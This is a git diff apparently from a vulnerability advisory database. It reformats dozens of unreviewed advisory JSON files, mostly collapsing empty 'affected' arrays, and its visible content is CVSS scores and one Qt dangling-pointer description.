a/advisories/unreviewed/2023/12/GHSA-cqvh-4wv3-g3cj/GHSA-cqvh-4wv3-g3cj.json b/advisories/unreviewed/2023/12/GHSA-cqvh-4wv3-g3cj/GHSA-cqvh-4wv3-g3cj.json index dc9607f5cc1..ac35ee50926 100644 --- a/advisories/unreviewed/2023/12/GHSA-cqvh-4wv3-g3cj/GHSA-cqvh-4wv3-g3cj.json +++ b/advisories/unreviewed/2023/12/GHSA-cqvh-4wv3-g3cj/GHSA-cqvh-4wv3-g3cj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/12/GHSA-ghrj-rqcw-5xqp/GHSA-ghrj-rqcw-5xqp.json b/advisories/unreviewed/2023/12/GHSA-ghrj-rqcw-5xqp/GHSA-ghrj-rqcw-5xqp.json index c57cff191a6..52957d478cc 100644 --- a/advisories/unreviewed/2023/12/GHSA-ghrj-rqcw-5xqp/GHSA-ghrj-rqcw-5xqp.json +++ b/advisories/unreviewed/2023/12/GHSA-ghrj-rqcw-5xqp/GHSA-ghrj-rqcw-5xqp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/12/GHSA-jgpj-vfxg-97h5/GHSA-jgpj-vfxg-97h5.json b/advisories/unreviewed/2023/12/GHSA-jgpj-vfxg-97h5/GHSA-jgpj-vfxg-97h5.json index a19bf6fa7cd..fe5a26cbcdb 100644 --- a/advisories/unreviewed/2023/12/GHSA-jgpj-vfxg-97h5/GHSA-jgpj-vfxg-97h5.json +++ b/advisories/unreviewed/2023/12/GHSA-jgpj-vfxg-97h5/GHSA-jgpj-vfxg-97h5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/12/GHSA-v64g-f7qf-63xm/GHSA-v64g-f7qf-63xm.json b/advisories/unreviewed/2023/12/GHSA-v64g-f7qf-63xm/GHSA-v64g-f7qf-63xm.json index 2dccc16bab9..cd55adb38a8 100644 --- a/advisories/unreviewed/2023/12/GHSA-v64g-f7qf-63xm/GHSA-v64g-f7qf-63xm.json +++ b/advisories/unreviewed/2023/12/GHSA-v64g-f7qf-63xm/GHSA-v64g-f7qf-63xm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-3wxf-8h2q-7rqj/GHSA-3wxf-8h2q-7rqj.json b/advisories/unreviewed/2024/01/GHSA-3wxf-8h2q-7rqj/GHSA-3wxf-8h2q-7rqj.json index 3a3c710990a..f45a111aa96 100644 --- a/advisories/unreviewed/2024/01/GHSA-3wxf-8h2q-7rqj/GHSA-3wxf-8h2q-7rqj.json +++ b/advisories/unreviewed/2024/01/GHSA-3wxf-8h2q-7rqj/GHSA-3wxf-8h2q-7rqj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-5q5j-r39w-wc64/GHSA-5q5j-r39w-wc64.json b/advisories/unreviewed/2024/01/GHSA-5q5j-r39w-wc64/GHSA-5q5j-r39w-wc64.json index f85e796e49e..4a7ffa78def 100644 --- a/advisories/unreviewed/2024/01/GHSA-5q5j-r39w-wc64/GHSA-5q5j-r39w-wc64.json +++ b/advisories/unreviewed/2024/01/GHSA-5q5j-r39w-wc64/GHSA-5q5j-r39w-wc64.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-5v7q-gqff-9cj8/GHSA-5v7q-gqff-9cj8.json b/advisories/unreviewed/2024/01/GHSA-5v7q-gqff-9cj8/GHSA-5v7q-gqff-9cj8.json index 94ee1c3fb70..e0e78d681ed 100644 --- a/advisories/unreviewed/2024/01/GHSA-5v7q-gqff-9cj8/GHSA-5v7q-gqff-9cj8.json +++ b/advisories/unreviewed/2024/01/GHSA-5v7q-gqff-9cj8/GHSA-5v7q-gqff-9cj8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-g884-f5hg-pgw8/GHSA-g884-f5hg-pgw8.json b/advisories/unreviewed/2024/01/GHSA-g884-f5hg-pgw8/GHSA-g884-f5hg-pgw8.json index e6e486a8f13..2e1a183edd1 100644 --- a/advisories/unreviewed/2024/01/GHSA-g884-f5hg-pgw8/GHSA-g884-f5hg-pgw8.json +++ b/advisories/unreviewed/2024/01/GHSA-g884-f5hg-pgw8/GHSA-g884-f5hg-pgw8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-j977-qqwc-8rmm/GHSA-j977-qqwc-8rmm.json b/advisories/unreviewed/2024/01/GHSA-j977-qqwc-8rmm/GHSA-j977-qqwc-8rmm.json index f7e2be0cd89..53da757525f 100644 --- a/advisories/unreviewed/2024/01/GHSA-j977-qqwc-8rmm/GHSA-j977-qqwc-8rmm.json +++ b/advisories/unreviewed/2024/01/GHSA-j977-qqwc-8rmm/GHSA-j977-qqwc-8rmm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-mr56-56j8-x6r4/GHSA-mr56-56j8-x6r4.json b/advisories/unreviewed/2024/01/GHSA-mr56-56j8-x6r4/GHSA-mr56-56j8-x6r4.json index 5a45e5ab676..021c350f292 100644 --- a/advisories/unreviewed/2024/01/GHSA-mr56-56j8-x6r4/GHSA-mr56-56j8-x6r4.json +++ b/advisories/unreviewed/2024/01/GHSA-mr56-56j8-x6r4/GHSA-mr56-56j8-x6r4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-p53v-hm2g-p66x/GHSA-p53v-hm2g-p66x.json b/advisories/unreviewed/2024/01/GHSA-p53v-hm2g-p66x/GHSA-p53v-hm2g-p66x.json index 18bdba93231..ecfd610f53e 100644 --- a/advisories/unreviewed/2024/01/GHSA-p53v-hm2g-p66x/GHSA-p53v-hm2g-p66x.json +++ b/advisories/unreviewed/2024/01/GHSA-p53v-hm2g-p66x/GHSA-p53v-hm2g-p66x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-27r2-6rqh-xrg8/GHSA-27r2-6rqh-xrg8.json b/advisories/unreviewed/2024/02/GHSA-27r2-6rqh-xrg8/GHSA-27r2-6rqh-xrg8.json index 2c4f1970725..b8c2666d7bb 100644 --- a/advisories/unreviewed/2024/02/GHSA-27r2-6rqh-xrg8/GHSA-27r2-6rqh-xrg8.json +++ b/advisories/unreviewed/2024/02/GHSA-27r2-6rqh-xrg8/GHSA-27r2-6rqh-xrg8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-2v36-29xm-jp89/GHSA-2v36-29xm-jp89.json b/advisories/unreviewed/2024/02/GHSA-2v36-29xm-jp89/GHSA-2v36-29xm-jp89.json index c0f6e2f9cd5..8bcd91cddbc 100644 --- a/advisories/unreviewed/2024/02/GHSA-2v36-29xm-jp89/GHSA-2v36-29xm-jp89.json +++ b/advisories/unreviewed/2024/02/GHSA-2v36-29xm-jp89/GHSA-2v36-29xm-jp89.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-32j2-p2qq-hh3c/GHSA-32j2-p2qq-hh3c.json b/advisories/unreviewed/2024/02/GHSA-32j2-p2qq-hh3c/GHSA-32j2-p2qq-hh3c.json index 4caea9f3905..c8224e16174 100644 --- a/advisories/unreviewed/2024/02/GHSA-32j2-p2qq-hh3c/GHSA-32j2-p2qq-hh3c.json +++ b/advisories/unreviewed/2024/02/GHSA-32j2-p2qq-hh3c/GHSA-32j2-p2qq-hh3c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-4pff-25fv-cm83/GHSA-4pff-25fv-cm83.json b/advisories/unreviewed/2024/02/GHSA-4pff-25fv-cm83/GHSA-4pff-25fv-cm83.json index b351836e3ff..477edce778d 100644 --- a/advisories/unreviewed/2024/02/GHSA-4pff-25fv-cm83/GHSA-4pff-25fv-cm83.json +++ b/advisories/unreviewed/2024/02/GHSA-4pff-25fv-cm83/GHSA-4pff-25fv-cm83.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-6f66-2p45-mpc2/GHSA-6f66-2p45-mpc2.json b/advisories/unreviewed/2024/02/GHSA-6f66-2p45-mpc2/GHSA-6f66-2p45-mpc2.json index 7e5fd492a0e..94e78866f6e 100644 --- a/advisories/unreviewed/2024/02/GHSA-6f66-2p45-mpc2/GHSA-6f66-2p45-mpc2.json +++ b/advisories/unreviewed/2024/02/GHSA-6f66-2p45-mpc2/GHSA-6f66-2p45-mpc2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-7x52-3x7c-gwj6/GHSA-7x52-3x7c-gwj6.json b/advisories/unreviewed/2024/02/GHSA-7x52-3x7c-gwj6/GHSA-7x52-3x7c-gwj6.json index 3039e9a1584..cb6420ac7e7 100644 --- a/advisories/unreviewed/2024/02/GHSA-7x52-3x7c-gwj6/GHSA-7x52-3x7c-gwj6.json +++ b/advisories/unreviewed/2024/02/GHSA-7x52-3x7c-gwj6/GHSA-7x52-3x7c-gwj6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-84hr-648m-6p8v/GHSA-84hr-648m-6p8v.json b/advisories/unreviewed/2024/02/GHSA-84hr-648m-6p8v/GHSA-84hr-648m-6p8v.json index 15568ee9f80..3a98d17be01 100644 --- a/advisories/unreviewed/2024/02/GHSA-84hr-648m-6p8v/GHSA-84hr-648m-6p8v.json +++ b/advisories/unreviewed/2024/02/GHSA-84hr-648m-6p8v/GHSA-84hr-648m-6p8v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-8ghq-wfr9-j428/GHSA-8ghq-wfr9-j428.json b/advisories/unreviewed/2024/02/GHSA-8ghq-wfr9-j428/GHSA-8ghq-wfr9-j428.json index e7a6f849440..847c33c6702 100644 --- a/advisories/unreviewed/2024/02/GHSA-8ghq-wfr9-j428/GHSA-8ghq-wfr9-j428.json +++ b/advisories/unreviewed/2024/02/GHSA-8ghq-wfr9-j428/GHSA-8ghq-wfr9-j428.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-8jj6-7vgp-rg47/GHSA-8jj6-7vgp-rg47.json b/advisories/unreviewed/2024/02/GHSA-8jj6-7vgp-rg47/GHSA-8jj6-7vgp-rg47.json index 426f56e503c..857d0a275e6 100644 --- a/advisories/unreviewed/2024/02/GHSA-8jj6-7vgp-rg47/GHSA-8jj6-7vgp-rg47.json +++ b/advisories/unreviewed/2024/02/GHSA-8jj6-7vgp-rg47/GHSA-8jj6-7vgp-rg47.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-8p5m-rr5g-qg99/GHSA-8p5m-rr5g-qg99.json b/advisories/unreviewed/2024/02/GHSA-8p5m-rr5g-qg99/GHSA-8p5m-rr5g-qg99.json index 822be1d113d..77a99c2f008 100644 --- a/advisories/unreviewed/2024/02/GHSA-8p5m-rr5g-qg99/GHSA-8p5m-rr5g-qg99.json +++ b/advisories/unreviewed/2024/02/GHSA-8p5m-rr5g-qg99/GHSA-8p5m-rr5g-qg99.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-8q8c-8w2c-527x/GHSA-8q8c-8w2c-527x.json b/advisories/unreviewed/2024/02/GHSA-8q8c-8w2c-527x/GHSA-8q8c-8w2c-527x.json index 47c4a29f133..9df55658f22 100644 --- a/advisories/unreviewed/2024/02/GHSA-8q8c-8w2c-527x/GHSA-8q8c-8w2c-527x.json +++ b/advisories/unreviewed/2024/02/GHSA-8q8c-8w2c-527x/GHSA-8q8c-8w2c-527x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-fqjq-52qh-7jmw/GHSA-fqjq-52qh-7jmw.json b/advisories/unreviewed/2024/02/GHSA-fqjq-52qh-7jmw/GHSA-fqjq-52qh-7jmw.json index 2847af03fde..69490ff39c0 100644 --- a/advisories/unreviewed/2024/02/GHSA-fqjq-52qh-7jmw/GHSA-fqjq-52qh-7jmw.json +++ b/advisories/unreviewed/2024/02/GHSA-fqjq-52qh-7jmw/GHSA-fqjq-52qh-7jmw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-fw46-3cv3-6c98/GHSA-fw46-3cv3-6c98.json b/advisories/unreviewed/2024/02/GHSA-fw46-3cv3-6c98/GHSA-fw46-3cv3-6c98.json index ca7449be152..a8602ddf921 100644 --- a/advisories/unreviewed/2024/02/GHSA-fw46-3cv3-6c98/GHSA-fw46-3cv3-6c98.json +++ b/advisories/unreviewed/2024/02/GHSA-fw46-3cv3-6c98/GHSA-fw46-3cv3-6c98.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-h4x6-mh99-9m5r/GHSA-h4x6-mh99-9m5r.json b/advisories/unreviewed/2024/02/GHSA-h4x6-mh99-9m5r/GHSA-h4x6-mh99-9m5r.json index e587c3be3dd..238838c5f3c 100644 --- a/advisories/unreviewed/2024/02/GHSA-h4x6-mh99-9m5r/GHSA-h4x6-mh99-9m5r.json +++ b/advisories/unreviewed/2024/02/GHSA-h4x6-mh99-9m5r/GHSA-h4x6-mh99-9m5r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-jmj3-p7rq-pq5q/GHSA-jmj3-p7rq-pq5q.json b/advisories/unreviewed/2024/02/GHSA-jmj3-p7rq-pq5q/GHSA-jmj3-p7rq-pq5q.json index 3d248820745..33da66ab755 100644 --- a/advisories/unreviewed/2024/02/GHSA-jmj3-p7rq-pq5q/GHSA-jmj3-p7rq-pq5q.json +++ b/advisories/unreviewed/2024/02/GHSA-jmj3-p7rq-pq5q/GHSA-jmj3-p7rq-pq5q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-q5cv-3jwf-5p4q/GHSA-q5cv-3jwf-5p4q.json b/advisories/unreviewed/2024/02/GHSA-q5cv-3jwf-5p4q/GHSA-q5cv-3jwf-5p4q.json index a9968b6d70b..36315ef4a99 100644 --- a/advisories/unreviewed/2024/02/GHSA-q5cv-3jwf-5p4q/GHSA-q5cv-3jwf-5p4q.json +++ b/advisories/unreviewed/2024/02/GHSA-q5cv-3jwf-5p4q/GHSA-q5cv-3jwf-5p4q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-vwj5-wr4r-cq36/GHSA-vwj5-wr4r-cq36.json b/advisories/unreviewed/2024/02/GHSA-vwj5-wr4r-cq36/GHSA-vwj5-wr4r-cq36.json index bd04692934c..a0903331b23 100644 --- a/advisories/unreviewed/2024/02/GHSA-vwj5-wr4r-cq36/GHSA-vwj5-wr4r-cq36.json +++ b/advisories/unreviewed/2024/02/GHSA-vwj5-wr4r-cq36/GHSA-vwj5-wr4r-cq36.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-w29g-3qfg-crvr/GHSA-w29g-3qfg-crvr.json b/advisories/unreviewed/2024/02/GHSA-w29g-3qfg-crvr/GHSA-w29g-3qfg-crvr.json index 9a3ce75371a..eac49b6f5b6 100644 --- a/advisories/unreviewed/2024/02/GHSA-w29g-3qfg-crvr/GHSA-w29g-3qfg-crvr.json +++ b/advisories/unreviewed/2024/02/GHSA-w29g-3qfg-crvr/GHSA-w29g-3qfg-crvr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-x645-349v-xwm6/GHSA-x645-349v-xwm6.json b/advisories/unreviewed/2024/02/GHSA-x645-349v-xwm6/GHSA-x645-349v-xwm6.json index 20e81b4e5bc..26a1b723762 100644 --- a/advisories/unreviewed/2024/02/GHSA-x645-349v-xwm6/GHSA-x645-349v-xwm6.json +++ b/advisories/unreviewed/2024/02/GHSA-x645-349v-xwm6/GHSA-x645-349v-xwm6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-x74g-xc7p-4fx7/GHSA-x74g-xc7p-4fx7.json b/advisories/unreviewed/2024/02/GHSA-x74g-xc7p-4fx7/GHSA-x74g-xc7p-4fx7.json index ecfcf70a462..accd0a000d5 100644 --- a/advisories/unreviewed/2024/02/GHSA-x74g-xc7p-4fx7/GHSA-x74g-xc7p-4fx7.json +++ b/advisories/unreviewed/2024/02/GHSA-x74g-xc7p-4fx7/GHSA-x74g-xc7p-4fx7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-27h4-9w4j-cp97/GHSA-27h4-9w4j-cp97.json b/advisories/unreviewed/2024/03/GHSA-27h4-9w4j-cp97/GHSA-27h4-9w4j-cp97.json index fceafe9acf9..97a242071a8 100644 --- a/advisories/unreviewed/2024/03/GHSA-27h4-9w4j-cp97/GHSA-27h4-9w4j-cp97.json +++ b/advisories/unreviewed/2024/03/GHSA-27h4-9w4j-cp97/GHSA-27h4-9w4j-cp97.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-2r57-8pgj-h27p/GHSA-2r57-8pgj-h27p.json b/advisories/unreviewed/2024/03/GHSA-2r57-8pgj-h27p/GHSA-2r57-8pgj-h27p.json index a6aa9ee22f2..fef5516ea73 100644 --- a/advisories/unreviewed/2024/03/GHSA-2r57-8pgj-h27p/GHSA-2r57-8pgj-h27p.json +++ b/advisories/unreviewed/2024/03/GHSA-2r57-8pgj-h27p/GHSA-2r57-8pgj-h27p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-4wx6-4vp5-v97f/GHSA-4wx6-4vp5-v97f.json b/advisories/unreviewed/2024/03/GHSA-4wx6-4vp5-v97f/GHSA-4wx6-4vp5-v97f.json index 08751d108b7..fba15230e1e 100644 --- a/advisories/unreviewed/2024/03/GHSA-4wx6-4vp5-v97f/GHSA-4wx6-4vp5-v97f.json +++ b/advisories/unreviewed/2024/03/GHSA-4wx6-4vp5-v97f/GHSA-4wx6-4vp5-v97f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-5gxc-5wfv-r5f9/GHSA-5gxc-5wfv-r5f9.json b/advisories/unreviewed/2024/03/GHSA-5gxc-5wfv-r5f9/GHSA-5gxc-5wfv-r5f9.json index 31bf7184db0..9a9f4fc2bb3 100644 --- a/advisories/unreviewed/2024/03/GHSA-5gxc-5wfv-r5f9/GHSA-5gxc-5wfv-r5f9.json +++ b/advisories/unreviewed/2024/03/GHSA-5gxc-5wfv-r5f9/GHSA-5gxc-5wfv-r5f9.json @@ -7,12 +7,8 @@ "CVE-2024-30161" ], "details": "In Qt before 6.5.6 and 6.6.x before 6.6.3, the wasm component may access QNetworkReply header data via a dangling pointer.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-5vc2-5pj4-gw6j/GHSA-5vc2-5pj4-gw6j.json b/advisories/unreviewed/2024/03/GHSA-5vc2-5pj4-gw6j/GHSA-5vc2-5pj4-gw6j.json index 19b73ac18e8..38efd25c4a2 100644 --- a/advisories/unreviewed/2024/03/GHSA-5vc2-5pj4-gw6j/GHSA-5vc2-5pj4-gw6j.json +++ b/advisories/unreviewed/2024/03/GHSA-5vc2-5pj4-gw6j/GHSA-5vc2-5pj4-gw6j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-64m5-4rw5-4hfh/GHSA-64m5-4rw5-4hfh.json b/advisories/unreviewed/2024/03/GHSA-64m5-4rw5-4hfh/GHSA-64m5-4rw5-4hfh.json index 743fba99d78..47b061896a8 100644 --- a/advisories/unreviewed/2024/03/GHSA-64m5-4rw5-4hfh/GHSA-64m5-4rw5-4hfh.json +++ b/advisories/unreviewed/2024/03/GHSA-64m5-4rw5-4hfh/GHSA-64m5-4rw5-4hfh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-6qmr-x8pc-q3r8/GHSA-6qmr-x8pc-q3r8.json b/advisories/unreviewed/2024/03/GHSA-6qmr-x8pc-q3r8/GHSA-6qmr-x8pc-q3r8.json index 64fede794c1..57e7f0fa9b8 100644 --- a/advisories/unreviewed/2024/03/GHSA-6qmr-x8pc-q3r8/GHSA-6qmr-x8pc-q3r8.json +++ b/advisories/unreviewed/2024/03/GHSA-6qmr-x8pc-q3r8/GHSA-6qmr-x8pc-q3r8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-6wcv-g2h3-2m7q/GHSA-6wcv-g2h3-2m7q.json b/advisories/unreviewed/2024/03/GHSA-6wcv-g2h3-2m7q/GHSA-6wcv-g2h3-2m7q.json index 244fe3c763d..023dc134b71 100644 --- a/advisories/unreviewed/2024/03/GHSA-6wcv-g2h3-2m7q/GHSA-6wcv-g2h3-2m7q.json +++ b/advisories/unreviewed/2024/03/GHSA-6wcv-g2h3-2m7q/GHSA-6wcv-g2h3-2m7q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-75q6-q84v-3c56/GHSA-75q6-q84v-3c56.json b/advisories/unreviewed/2024/03/GHSA-75q6-q84v-3c56/GHSA-75q6-q84v-3c56.json index d233b3b9a16..fa1524e3e51 100644 --- a/advisories/unreviewed/2024/03/GHSA-75q6-q84v-3c56/GHSA-75q6-q84v-3c56.json +++ b/advisories/unreviewed/2024/03/GHSA-75q6-q84v-3c56/GHSA-75q6-q84v-3c56.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-7fv7-4v93-qhhq/GHSA-7fv7-4v93-qhhq.json b/advisories/unreviewed/2024/03/GHSA-7fv7-4v93-qhhq/GHSA-7fv7-4v93-qhhq.json index 9c885a39915..4d92e639706 100644 --- a/advisories/unreviewed/2024/03/GHSA-7fv7-4v93-qhhq/GHSA-7fv7-4v93-qhhq.json +++ b/advisories/unreviewed/2024/03/GHSA-7fv7-4v93-qhhq/GHSA-7fv7-4v93-qhhq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-7mgr-jpp8-wjg4/GHSA-7mgr-jpp8-wjg4.json b/advisories/unreviewed/2024/03/GHSA-7mgr-jpp8-wjg4/GHSA-7mgr-jpp8-wjg4.json index b8b7a9b3029..c39b5cccd0c 100644 --- a/advisories/unreviewed/2024/03/GHSA-7mgr-jpp8-wjg4/GHSA-7mgr-jpp8-wjg4.json +++ b/advisories/unreviewed/2024/03/GHSA-7mgr-jpp8-wjg4/GHSA-7mgr-jpp8-wjg4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": 